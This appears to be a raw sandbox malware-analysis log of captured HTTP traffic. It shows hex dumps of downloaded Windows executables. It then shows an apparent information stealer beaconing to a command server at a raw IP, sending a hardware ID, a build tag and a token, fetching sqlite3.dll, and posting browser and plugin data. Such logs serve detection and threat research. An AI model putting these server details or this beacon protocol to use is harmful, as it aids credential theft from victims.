Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 10:12:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 10:12:13 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 10:12:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 10:12:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 10:12:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.176Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJHost: 62.204.41.176Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 36 36 42 34 41 30 32 44 38 46 32 39 36 33 34 39 35 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 37 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="hwid"0966B4A02D8F2963495975------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="build"default7_doz------GHCAKKEGCAAFHJJJDBKJ--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJJECBKKECFIEBGCAKJHost: 62.204.41.176Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 37 61 63 32 62 36 35 34 37 65 31 65 33 63 38 34 34 30 34 64 36 66 35 34 31 37 31 64 34 36 33 34 34 38 62 30 37 35 38 62 33 37 65 62 33 61 32 38 63 33 39 61 66 62 61 66 32 32 39 61 61 33 37 30 30 38 32 30 39 63 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="token"a7ac2b6547e1e3c84404d6f54171d463448b0758b37eb3a28c39afbaf229aa37008209c4------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="message"browsers------EHJJECBKKECFIEBGCAKJ--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFBAECBAEGDGDHIEHIHost: 62.204.41.176Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 37 61 63 32 62 36 35 34 37 65 31 65 33 63 38 34 34 30 34 64 36 66 35 34 31 37 31 64 34 36 33 34 34 38 62 30 37 35 38 62 33 37 65 62 33 61 32 38 63 33 39 61 66 62 61 66 32 32 39 61 61 33 37 30 30 38 32 30 39 63 34 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 2d 2d 0d 0a Data Ascii: ------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="token"a7ac2b6547e1e3c84404d6f54171d463448b0758b37eb3a28c39afbaf229aa37008209c4------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="message"plugins------CBKFBAECBAEGDGDHIEHI--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 62.204.41.176Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 37 61 63 32 62 36 35 34 37 65 31 65 33 63 38 34 34 30 34 64 36 66 35 34 31 37 31 64 34 36 33 34 34 38 62 30 37 35 38 62 33 37 65 62 33 61 32 38 63 33 39 61 66 62 61 66 32 32 39 61 61 33 37 30 30 38 32 30 39 63 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="token"a7ac2b6547e1e3c84404d6f54171d463448b0758b37eb3a28c39afbaf229aa37008209c4------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="message"fplugins------DAEBFHJKJEBFCBFHDAEG--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJJECBKKECFIEBGCAKJHost: 62.204.41.176Content-Length: 6971Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/sqlite3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKEHIEBKJJJJJKKKEHost: 62.204.41.176Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFCAFCBKFHJJJKKFHIHost: 62.204.41.176Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKJKJKKJDGDGDGIDGHost: 62.204.41.176Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 37 61 63 32 62 36 35 34 37 65 31 65 33 63 38 34 34 30 34 64 36 66 35 34 31 37 31 64 34 36 33 34 34 38 62 30 37 35 38 62 33 37 65 62 33 61 32 38 63 33 39 61 66 62 61 66 32 32 39 61 61 33 37 30 30 38 32 30 39 63 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 